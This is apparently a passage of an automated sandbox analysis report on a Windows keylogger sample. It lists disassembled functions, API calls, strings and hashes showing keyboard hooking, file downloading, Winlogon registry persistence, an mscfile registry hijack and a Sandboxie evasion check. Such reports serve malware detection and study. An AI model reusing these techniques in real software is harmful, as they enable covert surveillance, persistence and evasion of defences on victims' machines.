                                                  • Part of subcall function 00410CD2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,%02i:%02i:%02i:%03i ,?,00414BC4,?,00413760,?,?,_E@,?), ref: 00410D1E
                                                  • Part of subcall function 00410CD2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,_E@,?), ref: 00410D2B
                                                  • Part of subcall function 00410CD2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,_E@,?), ref: 00410D38
                                                  • Part of subcall function 00410CD2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,_E@,?), ref: 00410D45
                                                  • Part of subcall function 00410CD2: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,_E@,?), ref: 00410D4F
                                                  • Part of subcall function 00410CD2: printf.MSVCRT ref: 00410D56
                                                  • Part of subcall function 00410CD2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,_E@), ref: 00410D62
                                                  • Part of subcall function 00410CD2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,_E@), ref: 00410D6B
                                                  • Part of subcall function 00410CD2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,_E@), ref: 00410D74
                                                  • Part of subcall function 00410CD2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,_E@), ref: 00410D7D
                                                  • Part of subcall function 00410CD2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,_E@), ref: 00410D86
                                                  • Part of subcall function 00410CD2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,_E@), ref: 00410D8F
                                                • CreateThread.KERNEL32(00000000,00000000,Function_00004616,?,00000000,00000000), ref: 00404FAE
                                                  • Part of subcall function 004044C3: GetKeyboardLayout.USER32(00000000), ref: 004044C8
                                                • CreateThread.KERNEL32(00000000,00000000,Function_000045D8,?,00000000,00000000), ref: 00404F96
                                                • CreateThread.KERNEL32(00000000,00000000,Function_00004607,?,00000000,00000000), ref: 00404FA2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@CreateD@1@@ThreadV10@$?c_str@?$basic_string@LocalTimeV10@@$KeyboardLayoutV01@V10@0@Y?$basic_string@printfsprintf
                                                • String ID: Online Keylogger Started$[INFO]
                                                • API String ID: 1215226480-3343292223
                                                • Opcode ID: 646a677352259ca406276490e7065b6d629f7c6d1b5630a2b1b27ee5224108d7
                                                • Instruction ID: 5f0151975c8510c7fda51e761d5d85a07a6f94a2710822030126be99bdef0cc3
                                                • Opcode Fuzzy Hash: 646a677352259ca406276490e7065b6d629f7c6d1b5630a2b1b27ee5224108d7
                                                • Instruction Fuzzy Hash: 1D11E5F06002483FE7217B698CC6DBF7EACDAC1799700447EF54162281DA7D5E4487B9
                                                Function 0041135A Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 31COMMON
                                                Download Yara Rule
                                                APIs
                                                • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,?,0040375E,?,?), ref: 00411369
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,0040375E,?,?), ref: 00411373
                                                • ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(?,?,0040375E,?,?), ref: 0041137C
                                                • ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,0040375E,?,?), ref: 00411386
                                                • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,0040375E,?,?), ref: 00411390
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,0040375E,?,?), ref: 004113A6
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,0040375E,?,?), ref: 004113AF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$G@2@@std@@G@std@@$??0?$basic_string@?begin@?$basic_string@$??1?$basic_string@?end@?$basic_string@?length@?$basic_string@D@1@@V01@@
                                                • String ID: ^7@
                                                • API String ID: 2478582372-2142780172
                                                • Opcode ID: 0e87240cedd43ac40345285c67cdaba35df7ae443a680c715d7ff6c23904c2f5
                                                • Instruction ID: 5b9e4d41e0effa1abe2d42325b5bfd94b4549995def9576f2f352d1a1525ac23
                                                • Opcode Fuzzy Hash: 0e87240cedd43ac40345285c67cdaba35df7ae443a680c715d7ff6c23904c2f5
                                                • Instruction Fuzzy Hash: 8BF0977590010EABCF04EFA4E95D9EE7B78BF4430AB00C064F906972A0DA74AB05CB65
                                                Function 0040DF4D Relevance: 13.6, APIs: 9, Instructions: 67sleepfilenetworkCOMMON
                                                Download Yara Rule
                                                APIs
                                                • Sleep.KERNEL32(00000064), ref: 0040DF59
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000001), ref: 0040DF7C
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000000), ref: 0040DF8E
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040DFA9
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,00000000), ref: 0040DFB4
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000002,00000000), ref: 0040DFD6
                                                • URLDownloadToFileW.URLMON(00000000,00000000), ref: 0040DFDE
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(00000000,00000000), ref: 0040DFF2
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040E006
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: U?$char_traits@V?$allocator@$G@2@@std@@G@std@@$?c_str@?$basic_string@$??1?$basic_string@$??0?$basic_string@D@2@@std@@D@std@@DownloadFileSleepV01@@
                                                • String ID:
                                                • API String ID: 3062298965-0
                                                • Opcode ID: 0a608acb1cfbf9d2bda4a8d586b6d33f01c67cb96d51d5d4e2eb97eaf374c08e
                                                • Instruction ID: 1e733e21b8eb4b734f6a18e76189f4380bbd31b29490436d09cce0317758e49b
                                                • Opcode Fuzzy Hash: 0a608acb1cfbf9d2bda4a8d586b6d33f01c67cb96d51d5d4e2eb97eaf374c08e
                                                • Instruction Fuzzy Hash: ED116FB19061486FDB04EBB0DD599EE373CAF40305F0044AAF506E61E2EE345B488B59
                                                Function 00403132 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 64COMMON
                                                Download Yara Rule
                                                APIs
                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00419970,00419BC8,00000000), ref: 0040315E
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00403167
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(origmsc,00000000,000003E8,00000000), ref: 00403187
                                                  • Part of subcall function 0040A9EF: RegOpenKeyExA.ADVAPI32(80000001,00407880,00000000,00020019,00407880), ref: 0040AA09
                                                  • Part of subcall function 0040A9EF: RegQueryValueExA.ADVAPI32(00407880,?,00000000,00000000,?,?,00000208), ref: 0040AA25
                                                  • Part of subcall function 0040A9EF: RegCloseKey.ADVAPI32(00407880), ref: 0040AA30
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?), ref: 004031B2
                                                  • Part of subcall function 0040AA65: RegCreateKeyA.ADVAPI32(?,?,?), ref: 0040AA72
                                                  • Part of subcall function 0040AA65: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(80000002,00419980,?,00407BCA,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 0040AA81
                                                  • Part of subcall function 0040AA65: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,00407BCA,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 0040AA8B
                                                  • Part of subcall function 0040AA65: RegSetValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,00407BCA,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 0040AA9E
                                                  • Part of subcall function 0040AA65: RegCloseKey.ADVAPI32(?,?,00407BCA,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 0040AAA9
                                                  • Part of subcall function 0040AA65: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00407BCA,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 0040AAB8
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(origmsc), ref: 004031D1
                                                  • Part of subcall function 0040ACB8: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,origmsc), ref: 0040ACC9
                                                  • Part of subcall function 0040ACB8: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(004031DE,?), ref: 0040ACD9
                                                  • Part of subcall function 0040ACB8: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004031DE,80000001), ref: 0040ACF0
                                                  • Part of subcall function 0040ACB8: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004031DE), ref: 0040AD08
                                                  • Part of subcall function 0040ACB8: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040AD1F
                                                  • Part of subcall function 0040ACB8: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040AD28
                                                  • Part of subcall function 0040ACB8: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040AD31
                                                  • Part of subcall function 0040ACB8: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040AD3A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$?c_str@?$basic_string@$??1?$basic_string@$G@2@@std@@G@std@@$??0?$basic_string@D@1@@$CloseValue$?length@?$basic_string@?size@?$basic_string@CreateOpenQuery
                                                • String ID: Software\Classes\mscfile\shell\open\command$origmsc
                                                • API String ID: 1883807236-2313358711
                                                • Opcode ID: 920d5bafc3d51276bf4a7a75ea5828d009af6e92881e8e9abfbc4f88b7f5e3e2
                                                • Instruction ID: 89cef9655f84d49fe62a01630c1b0ff64e194b31992f440816768c493fc3ce6b
                                                • Opcode Fuzzy Hash: 920d5bafc3d51276bf4a7a75ea5828d009af6e92881e8e9abfbc4f88b7f5e3e2
                                                • Instruction Fuzzy Hash: 51110A72A0415437DB026BA8DC55BEFBA6C9B45302F0440F6F905B23C2DA390B4687AE
                                                Function 00409FA1 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 58sleepCOMMON
                                                Download Yara Rule
                                                APIs
                                                • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(00419958,004137F0,00000000,80000001,00419970), ref: 00409FBD
                                                • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00409FE9
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00409FF2
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(EXEpath,00000000,00000410,00000000), ref: 0040A00F
                                                  • Part of subcall function 0040A9EF: RegOpenKeyExA.ADVAPI32(80000001,00407880,00000000,00020019,00407880), ref: 0040AA09
                                                  • Part of subcall function 0040A9EF: RegQueryValueExA.ADVAPI32(00407880,?,00000000,00000000,?,?,00000208), ref: 0040AA25
                                                  • Part of subcall function 0040A9EF: RegCloseKey.ADVAPI32(00407880), ref: 0040AA30
                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(?), ref: 0040A033
                                                • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(00419958,004137F0), ref: 0040A043
                                                • Sleep.KERNEL32(00000BB8), ref: 0040A06A
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040A07E
                                                • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000003), ref: 0040A0AF
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040A0B8
                                                • ?size@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 0040A0C1
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 0040A0CE
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(EXEpath,00000000), ref: 0040A0DF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: U?$char_traits@V?$allocator@$?c_str@?$basic_string@D@2@@std@@D@std@@G@std@@$G@2@@std@@$?size@?$basic_string@$??8std@@G@2@@0@V?$basic_string@$??4?$basic_string@CloseOpenQuerySleepV01@Value
                                                • String ID: .exe$EXEpath$WDH$open$temp_$|EA$)A
                                                • API String ID: 3885969548-4292904181
                                                • Opcode ID: c561dc225f660c5649a62fc6d381b5c9714ad7b39b8a7cbbf28672b9763f3b8e
                                                • Instruction ID: 5ce5f56d814836a7d7c913f011f37f2a23188a8f242fef4b1dcdd93c69eb0a68
                                                • Opcode Fuzzy Hash: c561dc225f660c5649a62fc6d381b5c9714ad7b39b8a7cbbf28672b9763f3b8e
                                                • Instruction Fuzzy Hash: B60126B264031567DB006B54AC6AFDB731CAB44706F1040BBF605B62C2CEB819C4866E
                                                Function 00405020 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMON
                                                Download Yara Rule
                                                APIs
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Online Keylogger Stopped,?,?,0040C52F,0040C5BF,00000001), ref: 00405041
                                                  • Part of subcall function 0040512C: GetLocalTime.KERNEL32(?,00419830), ref: 0040513C
                                                  • Part of subcall function 0040512C: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,{ %04i/%02i/%02i %02i:%02i:%02i - ,?,! },?,?,?,?,?,6E@), ref: 00405172
                                                  • Part of subcall function 0040512C: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,6E@), ref: 0040517F
                                                  • Part of subcall function 0040512C: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,6E@), ref: 00405189
                                                  • Part of subcall function 0040512C: sprintf.MSVCRT ref: 00405197
                                                  • Part of subcall function 0040512C: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004051A3
                                                  • Part of subcall function 0040512C: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004051AC
                                                  • Part of subcall function 0040512C: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(?), ref: 004051C2
                                                  • Part of subcall function 0040512C: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004051DF
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Online Keylogger Stopped,?), ref: 00405058
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 0040506C
                                                  • Part of subcall function 00410CD2: GetLocalTime.KERNEL32(?), ref: 00410CE9
                                                  • Part of subcall function 00410CD2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,%02i:%02i:%02i:%03i ,?,00414BC4,?,00413760,?,?,_E@,?), ref: 00410D1E
                                                  • Part of subcall function 00410CD2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,_E@,?), ref: 00410D2B
                                                  • Part of subcall function 00410CD2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,_E@,?), ref: 00410D38
                                                  • Part of subcall function 00410CD2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,_E@,?), ref: 00410D45
                                                  • Part of subcall function 00410CD2: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,_E@,?), ref: 00410D4F
                                                  • Part of subcall function 00410CD2: printf.MSVCRT ref: 00410D56
                                                  • Part of subcall function 00410CD2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,_E@), ref: 00410D62
                                                  • Part of subcall function 00410CD2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,_E@), ref: 00410D6B
                                                  • Part of subcall function 00410CD2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,_E@), ref: 00410D74
                                                  • Part of subcall function 00410CD2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,_E@), ref: 00410D7D
                                                  • Part of subcall function 00410CD2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,_E@), ref: 00410D86
                                                  • Part of subcall function 00410CD2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,_E@), ref: 00410D8F
                                                • CloseHandle.KERNEL32(00000000), ref: 00405083
                                                • UnhookWindowsHookEx.USER32(00000000), ref: 00405095
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@D@1@@V10@$?c_str@?$basic_string@LocalTimeV10@@$CloseHandleHookUnhookV01@V10@0@WindowsY?$basic_string@printfsprintf
                                                • String ID: Online Keylogger Stopped$[INFO]
                                                • API String ID: 2594580136-2146459034
                                                • Opcode ID: 0bef3106ec53906a6e3af0d878d6c95e22956ee15dbd8531141e3242d56941ed
                                                • Instruction ID: 0e4a5bcc932a51b9ccaf35b4182b123e8ca4fbcc4f03a5a91f857ffd31fb5762
                                                • Opcode Fuzzy Hash: 0bef3106ec53906a6e3af0d878d6c95e22956ee15dbd8531141e3242d56941ed
                                                • Instruction Fuzzy Hash: 1501F9716002447FD7117F69DC858BF7BACEB4135174048BEE44293241DB79AD488BD9
                                                Function 00401000 Relevance: 12.1, APIs: 8, Instructions: 92threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000001C,00419970,00419BC8,00000000,004086F0,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00401013
                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000001D,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 0040103B
                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000001F,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00401060
                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000020,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00401085
                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000021,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 004010AA
                                                • CreateThread.KERNEL32(00000000,00000000,004011F8,00000000,00000000,00000000), ref: 004010C0
                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000022,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 004010D1
                                                • CreateThread.KERNEL32(00000000,00000000,00401216,00000000,00000000,00000000), ref: 004010E5
                                                  • Part of subcall function 004010F1: GetModuleHandleA.KERNEL32(SbieDll.dll,00401025,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 004010F6
                                                  • Part of subcall function 00401234: ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,0000002F,004135D8,00419970,00419BC8), ref: 00401259
                                                  • Part of subcall function 00401234: exit.MSVCRT ref: 00401263
                                                  • Part of subcall function 00401234: ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,0000002F,004135D4,00000001,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00401278
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
